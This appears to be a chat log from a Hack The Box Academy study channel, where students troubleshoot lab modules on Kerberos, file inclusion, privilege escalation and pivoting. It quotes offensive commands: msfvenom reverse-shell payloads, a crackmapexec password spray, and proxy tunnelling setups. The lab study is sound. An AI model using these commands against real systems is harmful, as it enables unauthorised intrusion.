I understand that this is to prevent erasure of existing TGTs for the current logon session. However, I don't understand the use case. From my understanding, assuming I have access to a local account, this account would not have anything to do with Kerberos TGTs. If I utilise PtT to gain access to a domain user (john's) context, I'm supposedly overwriting a TGT (which I assume local accounts have nothing to do with). Hence, my confusion is in this use case of Sacrificial Processes.
Domain users inherently use tickets to logon
It's how kerberos works
If it's a truly local account. It needs to interact with kerberos in some way
I understand that we get the tickets to logon. I don't understand when we have to use sacrificial processes (Rubeus "createnetonly").
Is it not the case that the interaction with kerberos should be via the Rubeus.exe application? In a truly local account, I shouldn't be afraid of any TGT overwriting in that case
It's good practice
What if the account you're on isnt local
Ok! Thanks for clarifying 🙂
I am stuck on Password Attacks Lab - Hard. I have cracked johanna's rdp password and logged on to the target. I downloaded the keepass file with evil-winrm and cracked the password. I opened the protected file and got the d... user and password. I have tried to use logon with rdp using d's password - no success. I have tried using smbclient with johanna's creds and d's creds - no success. I have looked for other files but can't find anything useful. I have tried using d's creds to get admin rights to look in d's folder, or dump SAM or LSASS - no success. I need some hints on where to go from here, please
You should be able to log in with d*
On smb or rdp? Neither one works for me.
Perhaps I am using the smbclient command wrong. I have tried copying and typing the password. No success. Here is the command I am using: smbclient \\10.129.202.222 -U david then I put in the password g..7 All I get is NT_STATUS_NOT_FOUND
First list shares -L
Also you can do // instead of \\\\
oK. Well, I could have sworn I did all that already, but now it seems to be working fine this time around. I'm on the share. Thank you!
That's good because I am pretty tired of this module. For some reason, it is kicking my butt although nothing in the material is all that complicated.
Tbh this will require some research. Mounting is the hard part, plenty of articles though -- shared in this channel too
(a) thank-you, (b) while I found it [largely due to this], and knowing the answer now, I can see where the course author was going, still feel like it's making a bit of a leap... now, maybe if it were say the first question of the first section in this module, it'd make a lot more sense, but going all this time... (for me at least) leads to a preconcieved notion on expected behavior of the app (IMHO). Anyhow, thx again for your respose to the other person who had the same challenge.
anyone else have problems with information gathering,at archive.org ?
Htb didn't use .com back then
If you do a search in the discord you'll see that question asked and answered a few times
thanks!
Is bug bounty path just a stripped down Pen test one btw?
Or are there module in bug bounty one pen test one doesn’t have
there are cbbh specific modules
Different goals, the only overlap is surface level web stuff
Awesome I’ll finish bug bounty path then do pen test one then
EDIT: Nevermind, just got ahead of myself... but all I can say is if I am on the right track, good luck to those who haven't done it yet... but a very, Very, VERY subtle nudge, reads like a bad dad joke... (well, not really a nudge, but will make sense when you get it)
Guys <dumb q> is there a dotnet decompiler for linux?
Vscodium probably
ok ty
I don't think it's a dumb question per-se... but... did you attempt to google it? Literally very first thing that pops up...
actually missed that particular one, mb
Fair enough -- I didn't try it, I thought to myself (when reading your question, I don't know myself and now curious... so googled... and then... yeah. But if you tried them and they didn't work, then fair enough
Sometimes windows doesn't like things that aren't compiled in windows
Where's a good place to point out small inaccuracies in a module?
Thank you much.
I’m stuck on the final question of Kerberos Attacks - Skill Assessment module.
I already have SERVER01 and login as system privileges, then I use rubeus monitor and try spoolsample.exe. dc01.inlanefreight.local server01.inlanefreight.local, but it appears to be not working for dc01, is there anything I'm missing? Please help for guidance. Thank you
you can coerce the DC, but you won't get a ticket from the machine account, read the question and rubeus output carefully
Thank you, I will have a try 😀
"How many files exist on the system that have the ".log" file extension? " Linux fundamentals
Im getting different numbers. 508, 507, 506
now im getting 504?
find / -type f -user root -name "*log" 2>/dev/null | wc -l
- You don't need the -user flag
- are you ssh into the target
- you need to search for *.log
- I dont need it because theres only 1 user on the machine im connecting to, right?
- yes
- What changes when switching from "*log" to *.log?
@storm elk Hi there, Can i DM you for the advanced SQL injection in the last flag?
Sure
*log will match any file that ends with "log". *.log will match files specifically ending in .log extension
I can't type * without dc making everything italic
thx
Hoping someone wouldn't mind verifying they can get a reverse shell on "Windows Privilege Escalation - Weak Permissions". First attempt (a long time ago) I got a shell that immediately died..haven't been able to get a shell since. Changed VPNs multiple times, went back to the previous section to get a reverse shell again just to make sure I wasn't having a netcat issue. Working through the 'SecurityService' steps in the module should be providing the shell, so I'd just like someone to confirm if there's an issue with the lab or me. I've gone in circles on this for too long, so any verification would be amazing
Weird, using "*x" in my last module problem got me files with the x extension
oh nevermind
what's your msfvenom command to generate the payload?
aahhh
tried msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f exe > SecurityService.exe and also msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.229 LPORT=4444 -f exe > SecurityService.exe (don't mind the IP change -- that was before/after VPN switch)
So "*log" gets all files that have log and the log extension
Ye
Which is why you got like 500 matches
try with windows/x64/shell_reverse_tcp
oh you did
yeah i've tried both multiple times across multiple VPNs
hmm let me check
ty
I’m stuck on the Skills Assessment in the File Inclusion module 😒
I’ve gone through the entire module multiple times and have gotten all the flags multiple times, but none of these techniques seem to be working on the Skills Assessment target application.
Are you listening with metasploit?
no, and I wasn't on the previous module either but still got a shell on netcat
Try listening with metasploit and see if you do get a shell
are you using powershell to run the sc command?
yeah although believe i tried cmd prompt earlier as well but it's been so long i can't remember. 99% powershell
and you don't see any output after you ran it?
no output
yeah that's how it worked in the previous section as well (dll instead of exe) but you could tell something executed. Appreciate the input. I basically logged out for the evening but i'll give that a try tomorrow
Anyone complete the File Inclusion module?
yeah use sc.exe start SecurityService, it worked for me
ask your question we'll see if we can help 🙂
I don’t even know what to ask.
I can’t get any traction at all on the last part. The Skills Assessment.
None of the LFI techniques seem to work.
What specific task are you struggling with
wdym techniques? Payloads?
I need to get RCE on the target application, but no LFI attacks are working.
Payloads.
Local/remote file inclusion techniques.
try different ones https://book.hacktricks.xyz/pentesting-web/file-inclusion
first try to get the page source, then use that to find how to get rce
Those look like all the ones I’ve tried.
You’ve completed that module?
One of those worked?
I don't do academy
Getting the page source is easy.
Not sure how that helped.
Oh…
I'm talking about the server side php code on the page, not right click view source
How do I get that?
It doesn’t seem to be working.
LFI
Curl?
It’s not clicking for me… I need a little more info.
How do you know if LFI is working on your target in the first place?
wdym "not working"? You're getting "file not found"?
Well, you get some type of information back as I did with all of the other exercises in the module.
Try reviewing the "local file inclusion" section to see how they teach you to read files
I’m not getting anything when I try to test.
I’ve done that like 3 times.
okay, so you can successfully read files on the server then?
Adding to the end of the url, encoding, ect
No. lol
what error are you getting??
None of the LFI worked.
I don't really understand what you're saying
you may also want to go over "PHP Filters" again, there's a section in there for source code disclosure
are you getting error codes from the web server?
we can't help you if you don't elaborate more
I get the “error page”
I feel I’ve tried them all. That’s why I’m here.
@uneven oracle here are a list of payloads to test if LFI works and you can go on from there
Ceald said he doesn't do academy. read this: #modules message
you didn't cause one would've worked 😄
Well I’m confused. I keep going through the module trying them and none are working. Not sure what I’m missing.
also try removing the # character, no files in linux have a #
It put that there itself.
you can lead a horse to water..
Remember, LFI is just accessing local files stored on the server
I originally didn’t have it there.
read the PHP Filters section and try the techniques please
I tried the filters, lol.
I’ll show one. One sec.
Really?
Every one I try just leaves the page blank at the bottom.
whatever you've tried is not even in the PHP Filters section...
Maybe try seeing what that payload does
It’s in the wrappers section.
As in decode it
no, that's not it Ceald
he took the base64 string from the skill assessment of that module and put it into the request
The payload I just tried is supposed to “id” command on the server and display that info.
if you can't get LFI working the first place, why go to RCE?
Solemn_1 I would suggest slowing down, re-reading the php filters content section, and really trying to understand it. you're trying to local file include a base64 string, so you're trying to read that string on the server. why do you think there's a file with that string in there?
Yeah lol
You guys just suggested that…
How do I get anything to work? lol
PHP Filters, not Wrappers...
What exactly do you get when you try a very basic payload?
They are the same.
Review the content go back and redo the exercises, everything in the skill assessment is covered in the module itself
Can you tell me what worked for you?
I just showed what happens with a basic payload.
they are not the same. unless they changed the module recently, php filters and php wrappers are two separate sections. you're not doing it correctly.
nope I've just tried it
I’ve done that multiple times,
buddy if you're just here to get someone to do the module for you, that's not gonna happen
I'll say again, read the PHP Filters section and try the techniques please
I’ve completed the entire module and gotten all flags multiple times.
I should have a basic understanding.
But these attacks are not working on the final assessment target.
specifically, the PHP Filters section
having problems with metasploit academy. i'm getting Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
Yes they do
They should work
I’m just saying filters are a type of wrapper.
there's an entire section called php filters
Going through now.
look at the table of contents on the right
I thought you were trying to get lfi?
I know.
Code execution using wrappers I think? Idk
I need local file inclusion to get remote code execution.
So, you're trying to finish the section question for https://academy.hackthebox.com/module/23/section/1492 ?
Does the module say that?
skills assessment that requires techniques from the previous sections
Oh, they're on the assessment, ok.
Relax bro.
Now what? lol
What source code do I want to see?
The “filters” sections shows how to scan for params and how to read source code of that page.
The source of the page to get rce :'
I got the source of the index page…
What do I do with this info?
This part looks important
With that info find a way to trigger rce
I need a little more direction.
Did you complete that skill assessment with rce?
Have you?
yeah it's rce
What now?
i've completed the entire path
Well help me out…
i did..
They're trying to
use the skills and knowledge you have gained in the module to complete it 
we helped you get started
That’s not very helpful…
You're not going to get handed the answer - the idea of Academy is to work through the sections of a module, learn from them and build your knowledge, and apply that knowledge to the skills assessment.
They said read the filters section. I did. I got source for that page.
I don’t know what’s next.
If you're struggling, you may want to go through the sections once more, and make some notes
Wtf
🤷♂️
I didn’t ask to get handed the answer. I asked for assistance.
It's all about using the techniques learned in the sections, and applying them to the assessment which is solvable using the techniques taught throughout the module
@fathom pendant is good at helping without exactly giving me the answer.
It doesn’t seem to be working. Telling me try again isn’t assisting.
you were just able to read the source code of the page, but you came here asking what's next instead of trying to use your newly found attack vector
I’ve gotten all the other flags in the section.
<user you are trying to reach is currently unavailable please try again later>
I don’t see anything new.
I was already able to do that.
Taking a break is often useful. You sound like you're getting frustrated, and that really doesn't help in finding the correct path. Everyone here has been doing their best to help with a gentle nudge. I'm not sure what else to say.
guys please
No @steady tusk
I’m getting frustrated because of the way people are speaking to me.
I’ve been working on the for a few days. I don’t know what I’m missing. I’ve taken plenty of breaks. I need help figuring it out.
no one here can help you with that, you'd need to reach out to the website/service that provides the account
Every one is just saying read the module again.
because you're refusing to put in effort and being a jerk about it
Read the module again
I’ve literally been working on this for days and you say no effort.
And I’m not the one being a jerk.
Stfu
if you're not happy with the help you're getting, feel free to complete it yourself
Thanks pal.
That’s rude.
How
via their support channels
Listen bro no one's gone straight up give you step by step guidance to the answer. You're not gonna be able to figure anything out irl if you don't train yourself to figure shit out yourself.
take a step back; take a breather; and do it slowly
you are on the right track by reading the code. you need to make sure you're capturing the pages correctly and then read them. this is covered in sections we were telling you to review, that's why we said to 're-read the module', we gave a specific section for the specific issue you're having
"stfu" is definitely not rude
I’m trying.
These guys are patronizing me. I’m trying not to get kicked off the server.
dude; i'd be saying the same thing
Bro. Stop talking to me. You not being helpful.
the block button exists yk
you're frustrated, I get that but pls be kind :)
Candy is trying to guide you to the answer
they're a sweetheart
Well… lol
What’s your advice?
The wrappers don’t seem to work on the final assessment. Idk.
You usually seem to be able to guide me without giving the answer.
might I suggest stopping for a bit and coming back after a while? taking a break will give you a new perspective :3
haven't done this module so can't tell ya
I’ve done that. lol.
I’m on my new perspective.
alright which module I've got a silver sub Ill try and help out
Ok…
I’m on File Inclusion, on the final skills assessment.
bet gimme a sec
have u tried log poisoning?
put the full vhost name
I can’t traverse the file system.
blog.inlanefreight.local
also make sure the LHOST is set to the right interface if it's got a listener
alright here's what we're gonna do
we're gonna find ourselves a lfi payload list, and throw that baby on this box
that's how I passed my oswe, trust it'll work
There is one technique that “may” work to help traverse the file system, but I don’t think I am executing it correctly.
How can I execute this?
I’ve passed that part.
I’m not getting much from it.
can you read the page source carefully for more information
oh wait I have silver annual I can see the solution
I wont give you the answer but Ill nudge u in the right direction
I thought the bit I circled was the important part.
👀
Okay I got it, now walk me through it, what have you tried so far, be patient, list everything, Ill guide you and tell you what you're missing
Can you guys take it to DM please?
How about you go sit in your dm?
I’m in modules tryna get help with a module.
Wooow
damn
This is a Tier 1 module. Spoilers for any module over Tier 0 are not permitted.
Please go to DM.
Okie doke, I wanted to keep it public so it'd be known I didnt outright give out the answer :p
Thanks, I understand
I’ve only been able to use a basic filter to see the source code.
I can’t do any file traversal. And the wrappers for rce are not working, idk.
well if you can see the source code, perhaps you should read it carefully 😮
Keep it public.
This is how you get promoted anyway, by helping people.
also lets take this to dms
@uneven oracle - this is no longer a request.
I dont like you very much
Someone is trying to help you. I am politely asking you to take it to DMs
Why?
I advise you to do so
let's take this to dms
I wont be helping you here, talk to me in dms otherwise I cant help
Why am I being ordered off the public discord?
orders from up top, my hands are tied
because it could broach into spoiler territory
Because like he said spoilers about content labeled Tier 1 or above are prohibited
We're not being hostile, please take a breath, calm down and accept the help.
I’m on a zero tier module.
People have definitely been patronizing me.
Feel free to continue
Oh ok…
probably shouldnt be that mean 😅
I never ask for a direct solution.
I’m not mean. I was being disrespected.
Im sorry you felt that way
Me too.
but I assure you that everyone in this server harbours no malice towards you, and genuinely does want to be of service
Module: AD Trust Attacks
Section: Skills Assessment
Issue: I am having an issue with the chisel server on Child-DC, I've checked the config of /etc/proxychains.conf and it's correctly routing through the proxy. I tried to ping DC.inlanefreight.ad but I don't get any response. When I ping it from child-dc, I get a ping reply. Can anyone help me?
have you done the module?
oh wait nvm I dont even have the module unlocked 
I thought it was included in silver annual
nono I read the answer, and understand the core problem, and slowly guide them towards it
what if it's not in the answer and requires understanding of what needs to be done?
anyways
ping doesn't work through proxychains
well I know enough to guide them, I know most of what's taught in all the paths, I've read alot :D
Chill, it's fine to discuss here. It's a Tier 0 module. Ideally guiding to the answer is the best way, which is what MV is trying to do.
if I feel like I dont know something I wont talk
I fucked up.
that's a tier 3 sir
No they're talking about AD Trust attacks now, t3
Ohhh
do you have any suggestions for me try if the proxy is correctly setup? I tried winrm and it says connection timeout
Well then
use ligolo-ng instead of chisel, it's less of a headache
Ligolo isn't covered in the module
I think I might just shut up. Have a good day everyone.
if it's a windows target, just netexec smb <ip> if it works you will see something
see @next bronze im helpful
```
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.114.3:445 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.114.3:445 <--socket error or timeout!
```
So why were you kicking me off?
Literally what we have told but aight 
Because I mistakenly thought you were discussing a Tier 1 module, as I said.
a simple misunderstanding cherie, forget about it, happens to the best of us
Ah… 👌🏽🫡
can you reach it in rdp from the 10.x ip?
```
2024/07/18 05:25:52 client: Connecting to ws://10.129.229.201:8080
2024/07/18 05:25:52 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2024/07/18 05:25:52 client: Connected (Latency 17.797832ms)
```
```
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080
```
yes I can reach the DHCP IP via RDP
socks 4 is not 1080 btw, that's socks 5
ok so socks instead of socks4 in the config
socks5 127.0.0.1 1080
thanks
if you want to show off you can use a similar approach
sed -i s/socks4/socks5/g <config_file>
@uneven oracle , if you are still stuck, feel free to dm me
Hey, in the Windows Fundamentals module, i tried to rdp into the given machine in the sections but i'm not able to connect to it. I tried this from the pwnbox as well as my vm which was connected to the vpn but it still can't connect to it. i tried to reset the rdp machine and after that if i try to connect, it connects for like a few seconds and disconnects showing some error. Additionally i tried to change the server but still the same error. Any help please?
What is the command you are using
try adding /timeout:60000
i tried to connect with xfreerdp
make sure you are connected to the vpn, additionally, you can try enclosing the password within single quotes
Thanks!
I do roughly the same but with google docs
works decent though.
What are the benefits of meterpreter port forwarding instead of meterpreter tunneling?
Is it necessary for revshells to work over different subnets? I don't think tunnelling will allow that afaik.
Tunneling can allow it, with some clever port forwarding
4.5 more modules before completion. Been a busy two weeks getting this all done 
Nice! Did you spend two weeks completing everything besides the ones you are missing now?
Hey, for the module - Port Forwarding with Windows Netsh - I cannot rdp into the htb-student account. The connection keeps timing out
am i doing something wrong here?
I still have question for Attacking common services (SQL), someone interested to discuss?
hmm it works on pwnbox tho :O... very strange since I have been able to rdp to targets via Kali in the other labs
Hey, if you check the xfreerdp help there is a timeout flag, I set it to 20000. Could help, if not, change VPN region etc.
the /timeout:20000 works! 😄
I am in ATTACKING COMMON SERVICES - Attacking FTP. I am currently running nmap <IP> and I only get the following open ports: 22, 53, 139, 445, no port related to FTP. I also ran an nmap scan on ports 21 and 2121 because I thought they might not be visible, <hidden> but their state is closed. What might be the problem?
Started from zero two weeks ago! Been cramming notes and working through like a madman. Hoping to take the exam by start of August, second attempt early September. Hopefully certify by end of September. Ambitious but ignorance is bliss lol
Module: Pivoting, Tunneling, and Port Forwarding
Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling
Question: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
Port 3389 for RDP is closed so I'm unable to use it. I've tried resetting the machine several times and have made sure to wait 3-5 minutes to let everything in the machine be configured. Is there a solution for this issue?
people who use cherrytree, it is possible to batch convert ctb into pdf
May I ask if this is changed into the middle of the picture
https://academy.hackthebox.com/module/113/section/1210
Section - Attacking Joomla.
Has anyone got 1 of the scripts working to answer the question? I'm having issues with both the python2.7 and python3 scripts given
You don't have to pay anything.
When it comes to fatty, I recommend you watch the video from IppSec https://www.youtube.com/watch?v=3bvKLj0akMM
00:00 - Intro
02:10 - Using wget to recursively download files off an anonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...
I looked at this and I saw that he did not recompile, but forwarded the port directly
There is a difference between Powershell for linux and Windows
Here is another blog post
https://0xdf.gitlab.io/2020/08/08/htb-fatty.html
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get the client to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL ...
There is something wrong with the curl. Idk lol.
How do you properly add a user agent to a curl command?
Ha, ha, ha. I've seen all of them
If I've intercepted in Burp, I right-click and 'copy for cURL', which includes that info. Makes it super easy
like this:
curl -H "User-Agent: user-Agent-Name-Here"
Something wasn’t working idk…
That’s how I did it.
The person that helped used burp, and that worked.
Could not get regular curl to work.
glad it worked 🙂
Smh, I've been on here all night… 🫨😪
But, I did get the flag… 🫠
haha thats good. it can definitely get frustrating lol
Hey, I am at the module "DNS Tunneling with Dnscat2" and am following the instructions for installing dnscat2. But when I ran 'sudo bundle install' I get the sh3 error 😦
I've been googling for solutions for the past 30 mins but cannot find one 😦 Can anyone please help me with this? Thank you
you can just skip this one tbh
it's not very practical and you'll likely not use it
AD Enumeration & Attacks - Skills Assessment Part II
I'm trying to do a password spray using crackmapexec. I set up dynamic pivoting using ssh -D, but for some reason crackmapexec keeps giving me this error
Even when trying to do it without pivoting, from the host to the pivoting target, it still gives the same error
Command used for dynamic port forwarding: ssh -D 1080 htb-student@ip
Command used for passwordspray: crackmapexec smb 172.16.7.3 -u users.txt -p Welcome1
